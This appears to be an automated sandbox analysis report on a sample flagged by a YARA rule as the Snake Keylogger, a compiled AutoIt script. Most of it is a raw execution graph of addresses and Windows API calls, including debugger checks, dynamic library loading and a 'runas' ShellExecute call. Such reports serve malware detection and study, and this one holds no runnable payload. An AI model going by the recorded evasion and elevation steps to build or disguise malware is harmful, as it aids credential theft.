MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:0.5%
Signature Coverage:6.8%
Total number of Nodes:2000
Total number of Limit Nodes:27
105209 91ec6b 105208->105209 105210 8e7b40 105208->105210 105678 937bdb 59 API calls _memmove 105209->105678 105672 8e7a51 105210->105672 105213 8e7b4c 105213->105056 105214 91ec75 105215 8e8047 59 API calls 105214->105215 105216 91ec7d Mailbox 105215->105216 105218 94408d 105217->105218 105219 9440a0 105218->105219 105220 944092 105218->105220 105222 8e7667 59 API calls 105219->105222 105221 8e8047 59 API calls 105220->105221 105270 94409b Mailbox 105221->105270 105223 9440a8 105222->105223 105224 8e7667 59 API calls 105223->105224 105225 9440b0 105224->105225 105226 8e7667 59 API calls 105225->105226 105227 9440bb 105226->105227 105228 8e7667 59 API calls 105227->105228 105229 9440c3 105228->105229 105230 8e7667 59 API calls 105229->105230 105231 9440cb 105230->105231 105232 8e7667 59 API calls 105231->105232 105233 9440d3 105232->105233 105234 8e7667 59 API calls 105233->105234 105235 9440db 105234->105235 105236 8e7667 59 API calls 105235->105236 105237 9440e3 105236->105237 105238 8e459b 59 API calls 105237->105238 105239 9440fa 105238->105239 105240 8e459b 59 API calls 105239->105240 105241 944113 105240->105241 105242 8e79f2 59 API calls 105241->105242 105243 94411f 105242->105243 105244 944132 105243->105244 105245 8e7d2c 59 API calls 105243->105245 105246 8e79f2 59 API calls 105244->105246 105245->105244 105247 94413b 105246->105247 105248 94414b 105247->105248 105249 8e7d2c 59 API calls 105247->105249 105250 8e8047 59 API calls 105248->105250 105249->105248 105251 944157 105250->105251 105252 8e7b2e 59 API calls 105251->105252 105253 944163 105252->105253 105679 944223 59 API calls 105253->105679 105255 944172 105680 944223 59 API calls 105255->105680 105257 944185 105258 8e79f2 59 API calls 105257->105258 105259 94418f 105258->105259 105260 944194 105259->105260 105261 9441a6 105259->105261 105262 8e7cab 59 API calls 105260->105262 105263 8e79f2 59 API calls 105261->105263 105269 9441a1 105262->105269 105264 9441af 105263->105264 105265 9441cd 
105264->105265 105268 8e7cab 59 API calls 105264->105268 105267 8e7b2e 59 API calls 105265->105267 105266 8e7b2e 59 API calls 105266->105265 105267->105270 105268->105269 105269->105266 105270->105064 105272 949162 __write_nolock 105271->105272 105273 900db6 Mailbox 59 API calls 105272->105273 105274 9491bf 105273->105274 105275 8e522e 59 API calls 105274->105275 105276 9491c9 105275->105276 105277 948f5f GetSystemTimeAsFileTime 105276->105277 105278 9491d4 105277->105278 105279 8e4ee5 85 API calls 105278->105279 105280 9491e7 _wcscmp 105279->105280 105281 9492b8 105280->105281 105282 94920b 105280->105282 105283 949734 96 API calls 105281->105283 105711 949734 105282->105711 105299 949284 _wcscat 105283->105299 105287 8e4f0b 74 API calls 105289 9492dd 105287->105289 105288 9492c1 105288->105071 105290 8e4f0b 74 API calls 105289->105290 105291 9492ed 105290->105291 105293 8e4f0b 74 API calls 105291->105293 105292 949239 _wcscat _wcscpy 105718 9040fb 58 API calls __wsplitpath_helper 105292->105718 105295 949308 105293->105295 105296 8e4f0b 74 API calls 105295->105296 105297 949318 105296->105297 105298 8e4f0b 74 API calls 105297->105298 105300 949333 105298->105300 105299->105287 105299->105288 105301 8e4f0b 74 API calls 105300->105301 105302 949343 105301->105302 105303 8e4f0b 74 API calls 105302->105303 105304 949353 105303->105304 105305 8e4f0b 74 API calls 105304->105305 105306 949363 105305->105306 105681 9498e3 GetTempPathW GetTempFileNameW 105306->105681 105308 94936f 105309 90525b 115 API calls 105308->105309 105311 949380 105309->105311 105311->105288 105313 8e4f0b 74 API calls 105311->105313 105324 94943a 105311->105324 105682 904863 105311->105682 105312 949445 105314 94945f 105312->105314 105315 94944b DeleteFileW 105312->105315 105313->105311 105316 949505 CopyFileW 105314->105316 105321 949469 _wcsncpy 105314->105321 105315->105288 105317 94952d DeleteFileW 105316->105317 105318 94951b DeleteFileW 105316->105318 105708 9498a2 CreateFileW 105317->105708 
105318->105288 105719 948b06 105321->105719 105695 9053a6 105324->105695 105325 9494f4 DeleteFileW 105325->105288 105326->104997 105327->105034 105328->105047 105378 8e4c03 105329->105378 105332 8e4c03 2 API calls 105335 8e4bdc 105332->105335 105333 8e4bec FreeLibrary 105334 8e4bf5 105333->105334 105336 90525b 105334->105336 105335->105333 105335->105334 105382 905270 105336->105382 105338 8e4dfc 105338->105135 105338->105136 105463 8e4c36 105339->105463 105341 8e4b8f 105344 8e4baa 105341->105344 105345 8e4ba1 FreeLibrary 105341->105345 105343 8e4c36 2 API calls 105343->105341 105346 8e4c70 105344->105346 105345->105344 105347 900db6 Mailbox 59 API calls 105346->105347 105348 8e4c85 105347->105348 105349 8e522e 59 API calls 105348->105349 105350 8e4c91 _memmove 105349->105350 105351 8e4ccc 105350->105351 105353 8e4d89 105350->105353 105354 8e4dc1 105350->105354 105352 8e4ec7 69 API calls 105351->105352 105357 8e4cd5 105352->105357 105467 8e4e89 CreateStreamOnHGlobal 105353->105467 105478 94991b 95 API calls 105354->105478 105358 8e4f0b 74 API calls 105357->105358 105360 91d8a7 105357->105360 105364 8e4d69 105357->105364 105473 8e4ee5 105357->105473 105358->105357 105361 8e4ee5 85 API calls 105360->105361 105362 91d8bb 105361->105362 105363 8e4f0b 74 API calls 105362->105363 105363->105364 105364->105143 105366 8e4f1d 105365->105366 105369 91d9cd 105365->105369 105502 9055e2 105366->105502 105370 949109 105634 948f5f 105370->105634 105372 94911f 105372->105151 105374 91d990 105373->105374 105375 8e4ed6 105373->105375 105639 905c60 105375->105639 105377 8e4ede 105379 8e4bd0 105378->105379 105380 8e4c0c LoadLibraryA 105378->105380 105379->105332 105379->105335 105380->105379 105381 8e4c1d GetProcAddress 105380->105381 105381->105379 105384 90527c __freefls@4 105382->105384 105383 90528f 105431 908b28 58 API calls __getptd_noexit 105383->105431 105384->105383 105386 9052c0 105384->105386 105401 9104e8 105386->105401 105387 905294 105432 908db6 9 API calls __wctomb_s_l 
105387->105432 105390 9052c5 105391 9052db 105390->105391 105392 9052ce 105390->105392 105394 905305 105391->105394 105395 9052e5 105391->105395 105433 908b28 58 API calls __getptd_noexit 105392->105433 105416 910607 105394->105416 105434 908b28 58 API calls __getptd_noexit 105395->105434 105397 90529f @_EH4_CallFilterFunc@8 __freefls@4 105397->105338 105402 9104f4 __freefls@4 105401->105402 105403 909c0b __lock 58 API calls 105402->105403 105410 910502 105403->105410 105404 910576 105436 9105fe 105404->105436 105405 91057d 105441 90881d 58 API calls 2 library calls 105405->105441 105408 910584 105408->105404 105442 909e2b InitializeCriticalSectionAndSpinCount 105408->105442 105409 9105f3 __freefls@4 105409->105390 105410->105404 105410->105405 105412 909c93 __mtinitlocknum 58 API calls 105410->105412 105439 906c50 59 API calls __lock 105410->105439 105440 906cba LeaveCriticalSection LeaveCriticalSection _doexit 105410->105440 105412->105410 105414 9105aa EnterCriticalSection 105414->105404 105424 910627 __wopenfile 105416->105424 105417 910641 105447 908b28 58 API calls __getptd_noexit 105417->105447 105419 9107fc 105419->105417 105423 91085f 105419->105423 105420 910646 105448 908db6 9 API calls __wctomb_s_l 105420->105448 105422 905310 105435 905332 LeaveCriticalSection LeaveCriticalSection _fseek 105422->105435 105444 9185a1 105423->105444 105424->105417 105424->105419 105449 9037cb 60 API calls 3 library calls 105424->105449 105427 9107f5 105427->105419 105450 9037cb 60 API calls 3 library calls 105427->105450 105429 910814 105429->105419 105451 9037cb 60 API calls 3 library calls 105429->105451 105431->105387 105432->105397 105433->105397 105434->105397 105435->105397 105443 909d75 LeaveCriticalSection 105436->105443 105438 910605 105438->105409 105439->105410 105440->105410 105441->105408 105442->105414 105443->105438 105452 917d85 105444->105452 105446 9185ba 105446->105422 105447->105420 105448->105422 105449->105427 105450->105429 105451->105419 105455 
917d91 __freefls@4 105452->105455 105453 917da7 105454 908b28 __fseek_nolock 58 API calls 105453->105454 105456 917dac 105454->105456 105455->105453 105457 917ddd 105455->105457 105458 908db6 __wctomb_s_l 9 API calls 105456->105458 105459 917e4e __wsopen_nolock 109 API calls 105457->105459 105462 917db6 __freefls@4 105458->105462 105460 917df9 105459->105460 105461 917e22 __wsopen_helper LeaveCriticalSection 105460->105461 105461->105462 105462->105446 105464 8e4b83 105463->105464 105465 8e4c3f LoadLibraryA 105463->105465 105464->105341 105464->105343 105465->105464 105466 8e4c50 GetProcAddress 105465->105466 105466->105464 105468 8e4ea3 FindResourceExW 105467->105468 105472 8e4ec0 105467->105472 105469 91d933 LoadResource 105468->105469 105468->105472 105470 91d948 SizeofResource 105469->105470 105469->105472 105471 91d95c LockResource 105470->105471 105470->105472 105471->105472 105472->105351 105474 91d9ab 105473->105474 105475 8e4ef4 105473->105475 105479 90584d 105475->105479 105477 8e4f02 105477->105357 105478->105351 105483 905859 __freefls@4 105479->105483 105480 90586b 105492 908b28 58 API calls __getptd_noexit 105480->105492 105482 905891 105494 906c11 105482->105494 105483->105480 105483->105482 105484 905870 105493 908db6 9 API calls __wctomb_s_l 105484->105493 105489 9058a6 105501 9058c8 LeaveCriticalSection LeaveCriticalSection _fseek 105489->105501 105491 90587b __freefls@4 105491->105477 105492->105484 105493->105491 105495 906c21 105494->105495 105496 906c43 EnterCriticalSection 105494->105496 105495->105496 105498 906c29 105495->105498 105497 905897 105496->105497 105500 9057be 83 API calls 4 library calls 105497->105500 105499 909c0b __lock 58 API calls 105498->105499 105499->105497 105500->105489 105501->105491 105505 9055fd 105502->105505 105504 8e4f2e 105504->105370 105506 905609 __freefls@4 105505->105506 105507 90564c 105506->105507 105508 905644 __freefls@4 105506->105508 105513 90561f _memset 105506->105513 105509 906c11 __lock_file 59 API 
calls 105507->105509 105508->105504 105510 905652 105509->105510 105518 90541d 105510->105518 105532 908b28 58 API calls __getptd_noexit 105513->105532 105514 905639 105533 908db6 9 API calls __wctomb_s_l 105514->105533 105519 905453 105518->105519 105522 905438 _memset 105518->105522 105534 905686 LeaveCriticalSection LeaveCriticalSection _fseek 105519->105534 105520 905443 105630 908b28 58 API calls __getptd_noexit 105520->105630 105522->105519 105522->105520 105524 905493 105522->105524 105524->105519 105526 9055a4 _memset 105524->105526 105535 9046e6 105524->105535 105542 910e5b 105524->105542 105610 910ba7 105524->105610 105632 910cc8 58 API calls 4 library calls 105524->105632 105633 908b28 58 API calls __getptd_noexit 105526->105633 105531 905448 105631 908db6 9 API calls __wctomb_s_l 105531->105631 105532->105514 105533->105508 105534->105508 105536 9046f0 105535->105536 105537 904705 105535->105537 105538 908b28 __fseek_nolock 58 API calls 105536->105538 105537->105524 105539 9046f5 105538->105539 105540 908db6 __wctomb_s_l 9 API calls 105539->105540 105541 904700 105540->105541 105541->105524 105543 910e93 105542->105543 105544 910e7c 105542->105544 105546 9115cb 105543->105546 105551 910ecd 105543->105551 105545 908af4 __read_nolock 58 API calls 105544->105545 105548 910e81 105545->105548 105547 908af4 __read_nolock 58 API calls 105546->105547 105549 9115d0 105547->105549 105550 908b28 __fseek_nolock 58 API calls 105548->105550 105553 908b28 __fseek_nolock 58 API calls 105549->105553 105590 910e88 105550->105590 105552 910ed5 105551->105552 105559 910eec 105551->105559 105554 908af4 __read_nolock 58 API calls 105552->105554 105555 910ee1 105553->105555 105556 910eda 105554->105556 105557 908db6 __wctomb_s_l 9 API calls 105555->105557 105560 908b28 __fseek_nolock 58 API calls 105556->105560 105557->105590 105558 910f01 105561 908af4 __read_nolock 58 API calls 105558->105561 105559->105558 105562 910f1b 105559->105562 105563 910f39 105559->105563 
105559->105590 105560->105555 105561->105556 105562->105558 105565 910f26 105562->105565 105564 90881d __malloc_crt 58 API calls 105563->105564 105566 910f49 105564->105566 105567 915c6b __stbuf 58 API calls 105565->105567 105568 910f51 105566->105568 105569 910f6c 105566->105569 105570 91103a 105567->105570 105571 908b28 __fseek_nolock 58 API calls 105568->105571 105573 9118c1 __lseeki64_nolock 60 API calls 105569->105573 105572 9110b3 ReadFile 105570->105572 105577 911050 GetConsoleMode 105570->105577 105574 910f56 105571->105574 105575 911593 GetLastError 105572->105575 105576 9110d5 105572->105576 105573->105565 105578 908af4 __read_nolock 58 API calls 105574->105578 105579 9115a0 105575->105579 105580 911093 105575->105580 105576->105575 105584 9110a5 105576->105584 105581 9110b0 105577->105581 105582 911064 105577->105582 105578->105590 105583 908b28 __fseek_nolock 58 API calls 105579->105583 105587 908b07 __dosmaperr 58 API calls 105580->105587 105592 911099 105580->105592 105581->105572 105582->105581 105585 91106a ReadConsoleW 105582->105585 105588 9115a5 105583->105588 105584->105592 105593 91110a 105584->105593 105594 911377 105584->105594 105585->105584 105586 91108d GetLastError 105585->105586 105586->105580 105587->105592 105589 908af4 __read_nolock 58 API calls 105588->105589 105589->105592 105590->105524 105591 902d55 _free 58 API calls 105591->105590 105592->105590 105592->105591 105596 911176 ReadFile 105593->105596 105602 9111f7 105593->105602 105594->105592 105600 91147d ReadFile 105594->105600 105597 911197 GetLastError 105596->105597 105603 9111a1 105596->105603 105597->105603 105598 9112b4 105605 9118c1 __lseeki64_nolock 60 API calls 105598->105605 105607 911264 MultiByteToWideChar 105598->105607 105599 9112a4 105604 908b28 __fseek_nolock 58 API calls 105599->105604 105601 9114a0 GetLastError 105600->105601 105609 9114ae 105600->105609 105601->105609 105602->105592 105602->105598 105602->105599 105602->105607 105603->105593 105606 9118c1 
__lseeki64_nolock 60 API calls 105603->105606 105604->105592 105605->105607 105606->105603 105607->105586 105607->105592 105608 9118c1 __lseeki64_nolock 60 API calls 105608->105609 105609->105594 105609->105608 105611 910bb2 105610->105611 105615 910bc7 105610->105615 105612 908b28 __fseek_nolock 58 API calls 105611->105612 105613 910bb7 105612->105613 105614 908db6 __wctomb_s_l 9 API calls 105613->105614 105624 910bc2 105614->105624 105616 910bfc 105615->105616 105617 915fe4 __getbuf 58 API calls 105615->105617 105615->105624 105618 9046e6 __fseek_nolock 58 API calls 105616->105618 105617->105616 105619 910c10 105618->105619 105620 910d47 __read 72 API calls 105619->105620 105621 910c17 105620->105621 105622 9046e6 __fseek_nolock 58 API calls 105621->105622 105621->105624 105623 910c3a 105622->105623 105623->105624 105625 9046e6 __fseek_nolock 58 API calls 105623->105625 105624->105524 105626 910c46 105625->105626 105626->105624 105627 9046e6 __fseek_nolock 58 API calls 105626->105627 105628 910c53 105627->105628 105629 9046e6 __fseek_nolock 58 API calls 105628->105629 105629->105624 105630->105531 105631->105519 105632->105524 105633->105531 105637 90520a GetSystemTimeAsFileTime 105634->105637 105636 948f6e 105636->105372 105638 905238 __aulldiv 105637->105638 105638->105636 105640 905c6c __freefls@4 105639->105640 105641 905c93 105640->105641 105642 905c7e 105640->105642 105644 906c11 __lock_file 59 API calls 105641->105644 105653 908b28 58 API calls __getptd_noexit 105642->105653 105646 905c99 105644->105646 105645 905c83 105654 908db6 9 API calls __wctomb_s_l 105645->105654 105655 9058d0 67 API calls 6 library calls 105646->105655 105649 905ca4 105656 905cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105649->105656 105651 905cb6 105652 905c8e __freefls@4 105651->105652 105652->105377 105653->105645 105654->105652 105655->105649 105656->105651 105658 8e785a 105657->105658 105659 8e78b7 105657->105659 105658->105659 105661 8e7865 105658->105661 105660 
8e7d2c 59 API calls 105659->105660 105667 8e7888 _memmove 105660->105667 105662 91eb09 105661->105662 105663 8e7880 105661->105663 105664 8e8029 59 API calls 105662->105664 105671 8e7f27 59 API calls Mailbox 105663->105671 105666 91eb13 105664->105666 105668 900db6 Mailbox 59 API calls 105666->105668 105667->105178 105669 91eb33 105668->105669 105670->105200 105671->105667 105673 8e7a85 _memmove 105672->105673 105674 8e7a5f 105672->105674 105673->105213 105673->105673 105674->105673 105675 900db6 Mailbox 59 API calls 105674->105675 105676 8e7ad4 105675->105676 105677 900db6 Mailbox 59 API calls 105676->105677 105677->105673 105678->105214 105679->105255 105680->105257 105681->105308 105683 90486f __freefls@4 105682->105683 105684 9048a5 105683->105684 105685 90488d 105683->105685 105687 90489d __freefls@4 105683->105687 105688 906c11 __lock_file 59 API calls 105684->105688 105762 908b28 58 API calls __getptd_noexit 105685->105762 105687->105311 105690 9048ab 105688->105690 105689 904892 105763 908db6 9 API calls __wctomb_s_l 105689->105763 105750 90470a 105690->105750 105696 9053b2 __freefls@4 105695->105696 105697 9053c6 105696->105697 105699 9053de 105696->105699 105932 908b28 58 API calls __getptd_noexit 105697->105932 105701 9053d6 __freefls@4 105699->105701 105702 906c11 __lock_file 59 API calls 105699->105702 105700 9053cb 105933 908db6 9 API calls __wctomb_s_l 105700->105933 105701->105312 105704 9053f0 105702->105704 105916 90533a 105704->105916 105709 9498de 105708->105709 105710 9498c8 SetFileTime CloseHandle 105708->105710 105709->105288 105710->105709 105714 949748 __tzset_nolock _wcscmp 105711->105714 105712 949109 GetSystemTimeAsFileTime 105712->105714 105713 8e4f0b 74 API calls 105713->105714 105714->105712 105714->105713 105715 949210 105714->105715 105716 8e4ee5 85 API calls 105714->105716 105715->105288 105717 9040fb 58 API calls __wsplitpath_helper 105715->105717 105716->105714 105717->105292 105718->105299 105720 948b11 105719->105720 105722 
948b1f 105719->105722 105721 90525b 115 API calls 105720->105721 105721->105722 105723 948b64 105722->105723 105724 90525b 115 API calls 105722->105724 105749 948b28 105722->105749 106005 948d91 105723->106005 105726 948b49 105724->105726 105726->105723 105728 948b52 105726->105728 105727 948ba8 105729 948bac 105727->105729 105730 948bcd 105727->105730 105732 9053a6 __fcloseall 83 API calls 105728->105732 105728->105749 105731 948bb9 105729->105731 105734 9053a6 __fcloseall 83 API calls 105729->105734 106009 9489a9 105730->106009 105738 9053a6 __fcloseall 83 API calls 105731->105738 105731->105749 105732->105749 105734->105731 105738->105749 105749->105317 105749->105325 105753 904719 105750->105753 105757 904737 105750->105757 105751 904727 105793 908b28 58 API calls __getptd_noexit 105751->105793 105753->105751 105753->105757 105760 904751 _memmove 105753->105760 105754 90472c 105794 908db6 9 API calls __wctomb_s_l 105754->105794 105764 9048dd LeaveCriticalSection LeaveCriticalSection _fseek 105757->105764 105759 9046e6 __fseek_nolock 58 API calls 105759->105760 105760->105757 105760->105759 105765 90d886 105760->105765 105795 904a3d 105760->105795 105801 90ae1e 78 API calls 5 library calls 105760->105801 105762->105689 105763->105687 105764->105687 105766 90d892 __freefls@4 105765->105766 105767 90d8b6 105766->105767 105768 90d89f 105766->105768 105770 90d955 105767->105770 105772 90d8ca 105767->105772 105875 908af4 58 API calls __getptd_noexit 105768->105875 105881 908af4 58 API calls __getptd_noexit 105770->105881 105771 90d8a4 105876 908b28 58 API calls __getptd_noexit 105771->105876 105775 90d8f2 105772->105775 105776 90d8e8 105772->105776 105802 90d206 105775->105802 105877 908af4 58 API calls __getptd_noexit 105776->105877 105777 90d8ed 105882 908b28 58 API calls __getptd_noexit 105777->105882 105784 90d961 105883 908db6 9 API calls __wctomb_s_l 105784->105883 105787 90d8ab __freefls@4 105787->105760 105793->105754 105794->105757 105796 904a50 
105795->105796 105800 904a74 105795->105800 105797 9046e6 __fseek_nolock 58 API calls 105796->105797 105796->105800 105798 904a6d 105797->105798 105799 90d886 __write 78 API calls 105798->105799 105799->105800 105800->105760 105801->105760 105803 90d212 __freefls@4 105802->105803 105804 90d261 EnterCriticalSection 105803->105804 105806 909c0b __lock 58 API calls 105803->105806 105805 90d287 __freefls@4 105804->105805 105807 90d237 105806->105807 105875->105771 105876->105787 105877->105777 105881->105777 105882->105784 105883->105787 105917 905349 105916->105917 105918 90535d 105916->105918 105965 908b28 58 API calls __getptd_noexit 105917->105965 105920 905359 105918->105920 105922 904a3d __flush 78 API calls 105918->105922 105934 905415 LeaveCriticalSection LeaveCriticalSection _fseek 105920->105934 105921 90534e 105966 908db6 9 API calls __wctomb_s_l 105921->105966 105924 905369 105922->105924 105935 910b77 105924->105935 105927 9046e6 __fseek_nolock 58 API calls 105928 905377 105927->105928 105939 910a02 105928->105939 105932->105700 105933->105701 105934->105701 105936 905371 105935->105936 105937 910b84 105935->105937 105936->105927 105937->105936 105938 902d55 _free 58 API calls 105937->105938 105938->105936 105940 910a0e __freefls@4 105939->105940 105941 910a32 105940->105941 105942 910a1b 105940->105942 105965->105921 105966->105920 106006 948db6 106005->106006 106008 948d9f __tzset_nolock _memmove 106005->106008 106007 9055e2 __fread_nolock 74 API calls 106006->106007 106007->106008 106008->105727 106010 90571c std::exception::_Copy_str 58 API calls 106009->106010 106047->104950 106048->104947 106049->104811 106050->104843 106051->104843 106052->104837 106053->104841 106054->104830 106055->104841 106056->104850 106057->104874 106058 907c56 106059 907c62 __freefls@4 106058->106059 106095 909e08 GetStartupInfoW 106059->106095 106061 907c67 106097 908b7c GetProcessHeap 106061->106097 106063 907cbf 106064 907cca 106063->106064 106180 907da6 58 API calls 3 
library calls 106063->106180 106098 909ae6 106064->106098 106067 907cd0 106069 907cdb __RTC_Initialize 106067->106069 106181 907da6 58 API calls 3 library calls 106067->106181 106119 90d5d2 106069->106119 106071 907cea 106072 907cf6 GetCommandLineW 106071->106072 106182 907da6 58 API calls 3 library calls 106071->106182 106138 914f23 GetEnvironmentStringsW 106072->106138 106076 907cf5 106076->106072 106078 907d10 106079 907d1b 106078->106079 106183 9030b5 58 API calls 3 library calls 106078->106183 106148 914d58 106079->106148 106082 907d21 106083 907d2c 106082->106083 106184 9030b5 58 API calls 3 library calls 106082->106184 106162 9030ef 106083->106162 106086 907d34 106087 907d3f __wwincmdln 106086->106087 106185 9030b5 58 API calls 3 library calls 106086->106185 106168 8e47d0 106087->106168 106090 907d53 106091 907d62 106090->106091 106186 903358 58 API calls _doexit 106090->106186 106187 9030e0 58 API calls _doexit 106091->106187 106094 907d67 __freefls@4 106096 909e1e 106095->106096 106096->106061 106097->106063 106188 903187 EncodePointer 106098->106188 106100 909aeb 106193 909d3c 106100->106193 106103 909af4 106206 909b5c 61 API calls 2 library calls 106103->106206 106106 909af9 106106->106067 106108 909b11 106200 9087d5 106108->106200 106111 909b53 106209 909b5c 61 API calls 2 library calls 106111->106209 106114 909b32 106114->106111 106116 909b38 106114->106116 106115 909b58 106115->106067 106208 909a33 58 API calls 4 library calls 106116->106208 106118 909b40 GetCurrentThreadId 106118->106067 106120 90d5de __freefls@4 106119->106120 106121 909c0b __lock 58 API calls 106120->106121 106122 90d5e5 106121->106122 106123 9087d5 __calloc_crt 58 API calls 106122->106123 106124 90d5f6 106123->106124 106125 90d661 GetStartupInfoW 106124->106125 106126 90d601 @_EH4_CallFilterFunc@8 __freefls@4 106124->106126 106127 90d7a5 106125->106127 106134 90d676 106125->106134 106126->106071 106128 90d86d 106127->106128 106132 90d7f2 GetStdHandle 106127->106132 106133 90d805 
GetFileType 106127->106133 106224 909e2b InitializeCriticalSectionAndSpinCount 106127->106224 106225 90d87d LeaveCriticalSection _doexit 106128->106225 106129 90d6c4 106129->106127 106135 90d6f8 GetFileType 106129->106135 106223 909e2b InitializeCriticalSectionAndSpinCount 106129->106223 106131 9087d5 __calloc_crt 58 API calls 106131->106134 106132->106127 106133->106127 106134->106127 106134->106129 106134->106131 106135->106129 106139 914f34 106138->106139 106140 907d06 106138->106140 106226 90881d 58 API calls 2 library calls 106139->106226 106144 914b1b GetModuleFileNameW 106140->106144 106142 914f5a _memmove 106143 914f70 FreeEnvironmentStringsW 106142->106143 106143->106140 106145 914b4f _wparse_cmdline 106144->106145 106147 914b8f _wparse_cmdline 106145->106147 106227 90881d 58 API calls 2 library calls 106145->106227 106147->106078 106149 914d71 __NMSG_WRITE 106148->106149 106153 914d69 106148->106153 106150 9087d5 __calloc_crt 58 API calls 106149->106150 106158 914d9a __NMSG_WRITE 106150->106158 106151 914df1 106152 902d55 _free 58 API calls 106151->106152 106152->106153 106153->106082 106154 9087d5 __calloc_crt 58 API calls 106154->106158 106155 914e16 106157 902d55 _free 58 API calls 106155->106157 106157->106153 106158->106151 106158->106153 106158->106154 106158->106155 106159 914e2d 106158->106159 106228 914607 58 API calls 2 library calls 106158->106228 106229 908dc6 IsProcessorFeaturePresent 106159->106229 106163 9030fb __IsNonwritableInCurrentImage 106162->106163 106244 90a4d1 106163->106244 106165 903119 __initterm_e 106166 902d40 __cinit 67 API calls 106165->106166 106167 903138 _doexit __IsNonwritableInCurrentImage 106165->106167 106166->106167 106167->106086 106169 8e47ea 106168->106169 106179 8e4889 106168->106179 106170 8e4824 IsThemeActive 106169->106170 106247 90336c 106170->106247 106174 8e4850 106259 8e48fd SystemParametersInfoW SystemParametersInfoW 106174->106259 106176 8e485c 106260 8e3b3a 106176->106260 106178 8e4864 
SystemParametersInfoW 106178->106179 106179->106090 106180->106064 106181->106069 106182->106076 106186->106091 106187->106094 106189 903198 __init_pointers __initp_misc_winsig 106188->106189 106210 90a524 EncodePointer 106189->106210 106191 9031b0 __init_pointers 106192 909e99 34 API calls 106191->106192 106192->106100 106194 909d48 106193->106194 106196 909af0 106194->106196 106211 909e2b InitializeCriticalSectionAndSpinCount 106194->106211 106196->106103 106197 909d8a 106196->106197 106198 909da1 TlsAlloc 106197->106198 106199 909b06 106197->106199 106199->106103 106199->106108 106201 9087dc 106200->106201 106203 908817 106201->106203 106205 9087fa 106201->106205 106212 9151f6 106201->106212 106203->106111 106207 909de6 TlsSetValue 106203->106207 106205->106201 106205->106203 106220 90a132 Sleep 106205->106220 106206->106106 106207->106114 106208->106118 106209->106115 106210->106191 106211->106194 106213 915201 106212->106213 106217 91521c 106212->106217 106214 91520d 106213->106214 106213->106217 106221 908b28 58 API calls __getptd_noexit 106214->106221 106215 91522c RtlAllocateHeap 106215->106217 106218 915212 106215->106218 106217->106215 106217->106218 106222 9033a1 DecodePointer 106217->106222 106218->106201 106220->106205 106221->106218 106222->106217 106223->106129 106224->106127 106225->106126 106226->106142 106227->106147 106228->106158 106230 908dd1 106229->106230 106235 908c59 106230->106235 106234 908dec 106234->106082 106236 908c73 _memset __call_reportfault 106235->106236 106237 908c93 IsDebuggerPresent 106236->106237 106243 90a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106237->106243 106239 90c5f6 __NMSG_WRITE 6 API calls 106241 908d7a 106239->106241 106240 908d57 __call_reportfault 106240->106239 106242 90a140 GetCurrentProcess TerminateProcess 106241->106242 106242->106234 106243->106240 106245 90a4d4 EncodePointer 106244->106245 106245->106245 106246 90a4ee 106245->106246 106246->106165 106248 909c0b __lock 58 API calls 
[Control-flow graph edge list omitted: this span is the node/edge data behind the interactive graph widget, not readable text. Recoverable information from the node labels, by address in the 008E0000 image: DecodePointer/EncodePointer (00903377), LeaveCriticalSection (00909D75), GetCurrentDirectoryW (008E3B51), IsDebuggerPresent (008E3B7A) branching to MessageBoxA (0091D272), SetCurrentDirectoryW (008E3C68, 0091D2B2), GetOpenFileNameW (0091EA3E), GetLongPathNameW (0090079E), GetSystemTimeAsFileTime (00949109), ReadFile and SetFilePointerEx (008E5850, 008E5AEE), CloseHandle (008E5C6F), GetStringTypeW (008E6F5D, 008E6FAA, 0090363D), GetVersionExW (008E49B8), GetCurrentProcess/IsWow64Process (008E4A93), GetSystemInfo (008E4B1F, 008E4B2B), GetNativeSystemInfo (008E4ADC), LoadLibraryA/GetProcAddress (008E4B40/008E4B51, subroutine 008E4B37), FreeLibrary (008E4AEF, 0095CFB8), GetStdHandle (008EF991), OleInitialize (008EF9E5), CreateThread (00947207), RegisterWindowMessageW (008F6145, 008E3715), RegOpenKeyExW/RegQueryValueExW/RegCloseKey (008E35C4/008E35DE/008E3614), the tray-window procedure (DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow), CharLowerBuffW (0095D7C0), VirtualProtect (00900CB5) and GetCurrentProcess/TerminateProcess (0095CE25). Nodes at 01673A98, 016716B8, 01673988 and 01674BB8, outside the 008E0000 image, are labelled GetPEB and Sleep.]

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008E3B68
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 008E3B7A
                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,009A52F8,009A52E0,?,?), ref: 008E3BEB
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                  • Part of subcall function 008F092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008E3C14,009A52F8,?,?,?), ref: 008F096E
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008E3C6F
                                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00997770,00000010), ref: 0091D281
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,009A52F8,?,?,?), ref: 0091D2B9
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00994260,009A52F8,?,?,?), ref: 0091D33F
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0091D346
                                                                                                                  • Part of subcall function 008E3A46: GetSysColorBrush.USER32(0000000F), ref: 008E3A50
                                                                                                                  • Part of subcall function 008E3A46: LoadCursorW.USER32(00000000,00007F00), ref: 008E3A5F
                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(00000063), ref: 008E3A76
                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(000000A4), ref: 008E3A88
